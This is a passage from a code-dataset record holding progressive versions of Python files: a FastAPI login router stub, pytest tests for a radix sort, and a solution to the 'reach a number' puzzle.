'bearer', 'user': user}\n",
"step-4": "import uuid\nfrom fastapi import APIRouter, Depends, HTTPException, Form, Body\nfrom fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm\nfrom sqlalchemy.orm import Session\nfrom configs.config_sqlalchemy import get_db\nfrom schema import store_schema\noauth2_scheme = OAuth2PasswordBearer(tokenUrl='auth/login')\nrouter = APIRouter(prefix='/auth', tags=['AUTHORIZATION AND AUTHENTICATION'\n ], responses={(200): {'description': 'Ok'}, (201): {'description':\n 'created'}, (400): {'description': 'Bad Request'}, (404): {\n 'description': 'Not found'}})\n\n\[email protected]('/account/register', summary='register to create a new store',\n response_model=store_schema.Store, status_code=201)\nasync def account_register(StoreName: str=Body(...), OwnerFirstName: str=\n Body(...), OwnerLastName: str=Body(...), OwnerEmail: str=Body(...)):\n return\n\n\[email protected]('/login', summary='login to get access token', status_code=200)\nasync def login(form_data: OAuth2PasswordRequestForm=Depends(), db: Session\n =Depends(get_db)):\n user = authenticate_user(email=form_data.username, password=form_data.\n password, db=db)\n if not user:\n raise HTTPException(status_code=401, detail=\n 'Incorrect username or password', headers={'WWW-Authenticate':\n 'Bearer'})\n access_token_expires = timedelta(minutes=settings.\n ACCESS_TOKEN_EXPIRE_MINUTES)\n access_token = create_access_token(data={'sub': str(user.id)},\n expires_delta=access_token_expires)\n return {'access_token': access_token, 'token_type': 'bearer', 'user': user}\n",
"step-5": "import uuid\n\nfrom fastapi import APIRouter, Depends, HTTPException, Form, Body\nfrom fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm\nfrom sqlalchemy.orm import Session\n\n# dependency\nfrom configs.config_sqlalchemy import get_db\n# schema\nfrom schema import store_schema \n\n\n\n# define the url the client will use to access the token\noauth2_scheme = OAuth2PasswordBearer(tokenUrl=\"auth/login\")\n\n# router object\nrouter = APIRouter(\n prefix=\"/auth\",\n tags=[\"AUTHORIZATION AND AUTHENTICATION\"],\n responses={\n 200:{'description':'Ok'},\n 201:{'description':'created'},\n 400: {\"description\": \"Bad Request\"},\n 404: {\"description\": \"Not found\"}\n } \n)\n\n# register a new account\[email protected](\"/account/register\",\nsummary='register to create a new store',\nresponse_model=store_schema.Store,\nstatus_code=201\n)\nasync def account_register(\n StoreName: str = Body(...),\n OwnerFirstName: str = Body(...),\n OwnerLastName: str = Body(...),\n OwnerEmail: str = Body(...),\n):\n return\n \n# account login\[email protected]('/login',\nsummary='login to get access token',\nstatus_code=200\n)\nasync def login(form_data: OAuth2PasswordRequestForm = Depends(), db:Session=Depends(get_db)):\n user = authenticate_user(email=form_data.username, password=form_data.password, db=db)\n if not user:\n raise HTTPException(\n status_code=401,\n detail=\"Incorrect username or password\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n access_token_expires = timedelta(minutes=settings.ACCESS_TOKEN_EXPIRE_MINUTES)\n access_token = create_access_token(\n data={\"sub\": str(user.id)}, expires_delta=access_token_expires\n )\n return {\"access_token\": access_token, \"token_type\": \"bearer\", \"user\":user}\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def test_stringify_nums():
"""."""
from radixsort import stringify_nums
nums = [1, 2, 3, 4, 5]
stringified_nums = stringify_nums(nums)
assert stringified_nums == ['1', '2', '3', '4', '5']
def test_while_condition():
"""."""
from radixsort import while_condition
stringified_nums = ['1', '2', '3', '4', '5000']
assert while_condition(stringified_nums) == 4
<|reserved_special_token_0|>
def test_push_into_buckets():
"""."""
from radixsort import push_into_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)
for key in full_buckets_dict:
if full_buckets_dict[key].peek():
assert full_buckets_dict[key].dequeue() == key
<|reserved_special_token_0|>
def test_radix_sort_verbose():
"""Test with many lists."""
from radixsort import radixsort
for i in range(100):
list_length = random.randint(0, 100)
unsorted_list = []
for x in range(list_length):
unsorted_list.append(random.randint(0, 100))
assert radixsort(unsorted_list) == sorted(unsorted_list)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_stringify_nums():
"""."""
from radixsort import stringify_nums
nums = [1, 2, 3, 4, 5]
stringified_nums = stringify_nums(nums)
assert stringified_nums == ['1', '2', '3', '4', '5']
def test_while_condition():
"""."""
from radixsort import while_condition
stringified_nums = ['1', '2', '3', '4', '5000']
assert while_condition(stringified_nums) == 4
def test_unravel_buckets():
"""."""
from radixsort import unravel_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
for bucket in buckets_dict:
buckets_dict[bucket].enqueue(bucket)
assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3',
'4', '5', '6', '7', '8', '9']
def test_push_into_buckets():
"""."""
from radixsort import push_into_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)
for key in full_buckets_dict:
if full_buckets_dict[key].peek():
assert full_buckets_dict[key].dequeue() == key
<|reserved_special_token_0|>
def test_radix_sort_verbose():
"""Test with many lists."""
from radixsort import radixsort
for i in range(100):
list_length = random.randint(0, 100)
unsorted_list = []
for x in range(list_length):
unsorted_list.append(random.randint(0, 100))
assert radixsort(unsorted_list) == sorted(unsorted_list)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_stringify_nums():
"""."""
from radixsort import stringify_nums
nums = [1, 2, 3, 4, 5]
stringified_nums = stringify_nums(nums)
assert stringified_nums == ['1', '2', '3', '4', '5']
def test_while_condition():
"""."""
from radixsort import while_condition
stringified_nums = ['1', '2', '3', '4', '5000']
assert while_condition(stringified_nums) == 4
def test_unravel_buckets():
"""."""
from radixsort import unravel_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
for bucket in buckets_dict:
buckets_dict[bucket].enqueue(bucket)
assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3',
'4', '5', '6', '7', '8', '9']
def test_push_into_buckets():
"""."""
from radixsort import push_into_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)
for key in full_buckets_dict:
if full_buckets_dict[key].peek():
assert full_buckets_dict[key].dequeue() == key
def test_radix_sort():
"""Test with simple list."""
from radixsort import radixsort
nums = [5, 3, 2, 7, 9, 4, 0, 1]
assert radixsort(nums) == [0, 1, 2, 3, 4, 5, 7, 9]
def test_radix_sort_verbose():
"""Test with many lists."""
from radixsort import radixsort
for i in range(100):
list_length = random.randint(0, 100)
unsorted_list = []
for x in range(list_length):
unsorted_list.append(random.randint(0, 100))
assert radixsort(unsorted_list) == sorted(unsorted_list)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import random
from collections import OrderedDict
from que_ import Queue
def test_stringify_nums():
"""."""
from radixsort import stringify_nums
nums = [1, 2, 3, 4, 5]
stringified_nums = stringify_nums(nums)
assert stringified_nums == ['1', '2', '3', '4', '5']
def test_while_condition():
"""."""
from radixsort import while_condition
stringified_nums = ['1', '2', '3', '4', '5000']
assert while_condition(stringified_nums) == 4
def test_unravel_buckets():
"""."""
from radixsort import unravel_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
for bucket in buckets_dict:
buckets_dict[bucket].enqueue(bucket)
assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3',
'4', '5', '6', '7', '8', '9']
def test_push_into_buckets():
"""."""
from radixsort import push_into_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)
for key in full_buckets_dict:
if full_buckets_dict[key].peek():
assert full_buckets_dict[key].dequeue() == key
def test_radix_sort():
"""Test with simple list."""
from radixsort import radixsort
nums = [5, 3, 2, 7, 9, 4, 0, 1]
assert radixsort(nums) == [0, 1, 2, 3, 4, 5, 7, 9]
def test_radix_sort_verbose():
"""Test with many lists."""
from radixsort import radixsort
for i in range(100):
list_length = random.randint(0, 100)
unsorted_list = []
for x in range(list_length):
unsorted_list.append(random.randint(0, 100))
assert radixsort(unsorted_list) == sorted(unsorted_list)
<|reserved_special_token_1|>
"""Test radix sort."""
import random
from collections import OrderedDict
from que_ import Queue
def test_stringify_nums():
"""."""
from radixsort import stringify_nums
nums = [1, 2, 3, 4, 5]
stringified_nums = stringify_nums(nums)
assert stringified_nums == ['1', '2', '3', '4', '5']
def test_while_condition():
"""."""
from radixsort import while_condition
stringified_nums = ['1', '2', '3', '4', '5000']
assert while_condition(stringified_nums) == 4
def test_unravel_buckets():
"""."""
from radixsort import unravel_buckets
buckets_dict = OrderedDict({
'none': Queue(),
'0': Queue(),
'1': Queue(),
'2': Queue(),
'3': Queue(),
'4': Queue(),
'5': Queue(),
'6': Queue(),
'7': Queue(),
'8': Queue(),
'9': Queue(),
})
for bucket in buckets_dict:
buckets_dict[bucket].enqueue(bucket)
assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
def test_push_into_buckets():
"""."""
from radixsort import push_into_buckets
buckets_dict = OrderedDict({
'none': Queue(),
'0': Queue(),
'1': Queue(),
'2': Queue(),
'3': Queue(),
'4': Queue(),
'5': Queue(),
'6': Queue(),
'7': Queue(),
'8': Queue(),
'9': Queue(),
})
nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)
for key in full_buckets_dict:
if full_buckets_dict[key].peek():
assert full_buckets_dict[key].dequeue() == key
def test_radix_sort():
"""Test with simple list."""
from radixsort import radixsort
nums = [5, 3, 2, 7, 9, 4, 0, 1]
assert radixsort(nums) == [0, 1, 2, 3, 4, 5, 7, 9]
def test_radix_sort_verbose():
"""Test with many lists."""
from radixsort import radixsort
# test on 100 lists
for i in range(100):
# generate random length of list
list_length = random.randint(0, 100)
unsorted_list = []
for x in range(list_length):
# generate random numbers for random length list
unsorted_list.append(random.randint(0, 100))
# test that list is sorted
assert radixsort(unsorted_list) == sorted(unsorted_list)
|
flexible
|
{
"blob_id": "fd907dbcea01679c08aeae6bcbf6e61786f40260",
"index": 2511,
"step-1": "<mask token>\n\n\ndef test_stringify_nums():\n \"\"\".\"\"\"\n from radixsort import stringify_nums\n nums = [1, 2, 3, 4, 5]\n stringified_nums = stringify_nums(nums)\n assert stringified_nums == ['1', '2', '3', '4', '5']\n\n\ndef test_while_condition():\n \"\"\".\"\"\"\n from radixsort import while_condition\n stringified_nums = ['1', '2', '3', '4', '5000']\n assert while_condition(stringified_nums) == 4\n\n\n<mask token>\n\n\ndef test_push_into_buckets():\n \"\"\".\"\"\"\n from radixsort import push_into_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)\n for key in full_buckets_dict:\n if full_buckets_dict[key].peek():\n assert full_buckets_dict[key].dequeue() == key\n\n\n<mask token>\n\n\ndef test_radix_sort_verbose():\n \"\"\"Test with many lists.\"\"\"\n from radixsort import radixsort\n for i in range(100):\n list_length = random.randint(0, 100)\n unsorted_list = []\n for x in range(list_length):\n unsorted_list.append(random.randint(0, 100))\n assert radixsort(unsorted_list) == sorted(unsorted_list)\n",
"step-2": "<mask token>\n\n\ndef test_stringify_nums():\n \"\"\".\"\"\"\n from radixsort import stringify_nums\n nums = [1, 2, 3, 4, 5]\n stringified_nums = stringify_nums(nums)\n assert stringified_nums == ['1', '2', '3', '4', '5']\n\n\ndef test_while_condition():\n \"\"\".\"\"\"\n from radixsort import while_condition\n stringified_nums = ['1', '2', '3', '4', '5000']\n assert while_condition(stringified_nums) == 4\n\n\ndef test_unravel_buckets():\n \"\"\".\"\"\"\n from radixsort import unravel_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n for bucket in buckets_dict:\n buckets_dict[bucket].enqueue(bucket)\n assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3',\n '4', '5', '6', '7', '8', '9']\n\n\ndef test_push_into_buckets():\n \"\"\".\"\"\"\n from radixsort import push_into_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)\n for key in full_buckets_dict:\n if full_buckets_dict[key].peek():\n assert full_buckets_dict[key].dequeue() == key\n\n\n<mask token>\n\n\ndef test_radix_sort_verbose():\n \"\"\"Test with many lists.\"\"\"\n from radixsort import radixsort\n for i in range(100):\n list_length = random.randint(0, 100)\n unsorted_list = []\n for x in range(list_length):\n unsorted_list.append(random.randint(0, 100))\n assert radixsort(unsorted_list) == sorted(unsorted_list)\n",
"step-3": "<mask token>\n\n\ndef test_stringify_nums():\n \"\"\".\"\"\"\n from radixsort import stringify_nums\n nums = [1, 2, 3, 4, 5]\n stringified_nums = stringify_nums(nums)\n assert stringified_nums == ['1', '2', '3', '4', '5']\n\n\ndef test_while_condition():\n \"\"\".\"\"\"\n from radixsort import while_condition\n stringified_nums = ['1', '2', '3', '4', '5000']\n assert while_condition(stringified_nums) == 4\n\n\ndef test_unravel_buckets():\n \"\"\".\"\"\"\n from radixsort import unravel_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n for bucket in buckets_dict:\n buckets_dict[bucket].enqueue(bucket)\n assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3',\n '4', '5', '6', '7', '8', '9']\n\n\ndef test_push_into_buckets():\n \"\"\".\"\"\"\n from radixsort import push_into_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)\n for key in full_buckets_dict:\n if full_buckets_dict[key].peek():\n assert full_buckets_dict[key].dequeue() == key\n\n\ndef test_radix_sort():\n \"\"\"Test with simple list.\"\"\"\n from radixsort import radixsort\n nums = [5, 3, 2, 7, 9, 4, 0, 1]\n assert radixsort(nums) == [0, 1, 2, 3, 4, 5, 7, 9]\n\n\ndef test_radix_sort_verbose():\n \"\"\"Test with many lists.\"\"\"\n from radixsort import radixsort\n for i in range(100):\n list_length = random.randint(0, 100)\n unsorted_list = []\n for x in range(list_length):\n unsorted_list.append(random.randint(0, 100))\n assert radixsort(unsorted_list) == sorted(unsorted_list)\n",
"step-4": "<mask token>\nimport random\nfrom collections import OrderedDict\nfrom que_ import Queue\n\n\ndef test_stringify_nums():\n \"\"\".\"\"\"\n from radixsort import stringify_nums\n nums = [1, 2, 3, 4, 5]\n stringified_nums = stringify_nums(nums)\n assert stringified_nums == ['1', '2', '3', '4', '5']\n\n\ndef test_while_condition():\n \"\"\".\"\"\"\n from radixsort import while_condition\n stringified_nums = ['1', '2', '3', '4', '5000']\n assert while_condition(stringified_nums) == 4\n\n\ndef test_unravel_buckets():\n \"\"\".\"\"\"\n from radixsort import unravel_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n for bucket in buckets_dict:\n buckets_dict[bucket].enqueue(bucket)\n assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3',\n '4', '5', '6', '7', '8', '9']\n\n\ndef test_push_into_buckets():\n \"\"\".\"\"\"\n from radixsort import push_into_buckets\n buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),\n '2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(\n ), '7': Queue(), '8': Queue(), '9': Queue()})\n nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)\n for key in full_buckets_dict:\n if full_buckets_dict[key].peek():\n assert full_buckets_dict[key].dequeue() == key\n\n\ndef test_radix_sort():\n \"\"\"Test with simple list.\"\"\"\n from radixsort import radixsort\n nums = [5, 3, 2, 7, 9, 4, 0, 1]\n assert radixsort(nums) == [0, 1, 2, 3, 4, 5, 7, 9]\n\n\ndef test_radix_sort_verbose():\n \"\"\"Test with many lists.\"\"\"\n from radixsort import radixsort\n for i in range(100):\n list_length = random.randint(0, 100)\n unsorted_list = []\n for x in range(list_length):\n unsorted_list.append(random.randint(0, 100))\n assert radixsort(unsorted_list) == sorted(unsorted_list)\n",
"step-5": "\"\"\"Test radix sort.\"\"\"\n\nimport random\nfrom collections import OrderedDict\nfrom que_ import Queue\n\n\ndef test_stringify_nums():\n \"\"\".\"\"\"\n from radixsort import stringify_nums\n nums = [1, 2, 3, 4, 5]\n stringified_nums = stringify_nums(nums)\n assert stringified_nums == ['1', '2', '3', '4', '5']\n\n\ndef test_while_condition():\n \"\"\".\"\"\"\n from radixsort import while_condition\n stringified_nums = ['1', '2', '3', '4', '5000']\n assert while_condition(stringified_nums) == 4\n\n\ndef test_unravel_buckets():\n \"\"\".\"\"\"\n from radixsort import unravel_buckets\n buckets_dict = OrderedDict({\n 'none': Queue(),\n '0': Queue(),\n '1': Queue(),\n '2': Queue(),\n '3': Queue(),\n '4': Queue(),\n '5': Queue(),\n '6': Queue(),\n '7': Queue(),\n '8': Queue(),\n '9': Queue(),\n })\n\n for bucket in buckets_dict:\n buckets_dict[bucket].enqueue(bucket)\n\n assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n\ndef test_push_into_buckets():\n \"\"\".\"\"\"\n from radixsort import push_into_buckets\n\n buckets_dict = OrderedDict({\n 'none': Queue(),\n '0': Queue(),\n '1': Queue(),\n '2': Queue(),\n '3': Queue(),\n '4': Queue(),\n '5': Queue(),\n '6': Queue(),\n '7': Queue(),\n '8': Queue(),\n '9': Queue(),\n })\n\n nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)\n\n for key in full_buckets_dict:\n if full_buckets_dict[key].peek():\n assert full_buckets_dict[key].dequeue() == key\n\n\ndef test_radix_sort():\n \"\"\"Test with simple list.\"\"\"\n from radixsort import radixsort\n nums = [5, 3, 2, 7, 9, 4, 0, 1]\n assert radixsort(nums) == [0, 1, 2, 3, 4, 5, 7, 9]\n\n\ndef test_radix_sort_verbose():\n \"\"\"Test with many lists.\"\"\"\n from radixsort import radixsort\n # test on 100 lists\n for i in range(100):\n # generate random length of list\n list_length = random.randint(0, 100)\n unsorted_list = []\n for x in range(list_length):\n # generate random numbers for random length list\n unsorted_list.append(random.randint(0, 100))\n\n # test that list is sorted\n assert radixsort(unsorted_list) == sorted(unsorted_list)\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
def reachNumber(self, target):
target = abs(target)
k = 0
while target > 0:
k += 1
target -= k
return k if target % 2 == 0 else k + 1 + k % 2
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution(object):
def reachNumber(self, target):
target = abs(target)
k = 0
while target > 0:
k += 1
target -= k
return k if target % 2 == 0 else k + 1 + k % 2
if __name__ == '__main__':
    s = int(input())
    s1 = Solution()
    print(s1.reachNumber(s))
<|reserved_special_token_1|>
# Minimum number of moves to reach the target; LeetCode problem 754 https://leetcode.com/problems/reach-a-number/solution/
# Case analysis: reaching target is the same as reaching abs(target)
# 1. total = 1+2+...+k; find the smallest k with total >= target. At least k moves are needed; the overshoot is d = total - target
# 2. If d is even, flipping the sign of the move of size d/2 cancels it, so k moves reach target
# 3. If d is odd, k moves cannot reach it: any sign flip changes the sum by an even amount, so d cannot be cancelled; take one more move and check whether d+k+1 is even
# 4. If it is even, k+1 moves suffice
# 5. If d+k+1 is odd (d is odd, so k+1 is even), target cannot be reached in k+1 moves; one more move makes d+k+1+k+2 even, so k+2 moves suffice
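# Worked example (added for illustration, not part of the original solution):
#   target = 5 -> partial sums 1, 3, 6, so k = 3 and the overshoot is d = 6 - 5 = 1 (odd)
#   d + k + 1 = 1 + 4 = 5 is still odd, so the answer is k + 2 = 5
#   check: +1 + 2 + 3 + 4 - 5 = 5, reached in exactly 5 moves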
class Solution(object):
def reachNumber(self, target):
target = abs(target)
k = 0
while target > 0:
k += 1
target -= k
return k if target % 2 == 0 else k + 1 + k%2
if __name__ == '__main__':
    s = int(input())
    s1 = Solution()
    print(s1.reachNumber(s))
|
flexible
|
{
"blob_id": "4b255b648f67e6bcc30eecc7975bbb1a356b2499",
"index": 2656,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n\n\n<mask token>\n",
"step-3": "class Solution(object):\n\n def reachNumber(self, target):\n target = abs(target)\n k = 0\n while target > 0:\n k += 1\n target -= k\n return k if target % 2 == 0 else k + 1 + k % 2\n\n\n<mask token>\n",
"step-4": "class Solution(object):\n\n def reachNumber(self, target):\n target = abs(target)\n k = 0\n while target > 0:\n k += 1\n target -= k\n return k if target % 2 == 0 else k + 1 + k % 2\n\n\nif __name__ == '__main__':\n s = input()\n s1 = Solution()\n print(s1.solution(s))\n",
"step-5": "#到达终点的最小步数 leetcode原题 754 https://leetcode.com/problems/reach-a-number/solution/\n# 分情况讨论:到target与到abs(target)的情况是一样的\n# 1. total = 1+2+...+k,求total刚好大于等于n的k,可知到达target至少要用k步,此时超出d=total-k\n# 2. 如果d为偶数,则只需将d/2步反向即可,k步即可到达target\n# 3. 如果d为奇数,则k步不可能到达,因为任何反转都会改变偶数距离,不可能消去d,则再走一步判断d+k+1是否为偶数\n# 4. 如果为偶数,说明k+1步可到\n# 5. 如果d+k+1为奇数,且已知d为奇数,说明k+1为偶数,不可能在k+1步走到,再走一步,d+k+1+k+2必为偶数,k+2步可到\n\nclass Solution(object):\n def reachNumber(self, target):\n target = abs(target)\n k = 0\n while target > 0:\n k += 1\n target -= k\n\n return k if target % 2 == 0 else k + 1 + k%2\n\nif __name__ == '__main__':\n s = input()\n s1 = Solution()\n print(s1.solution(s))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |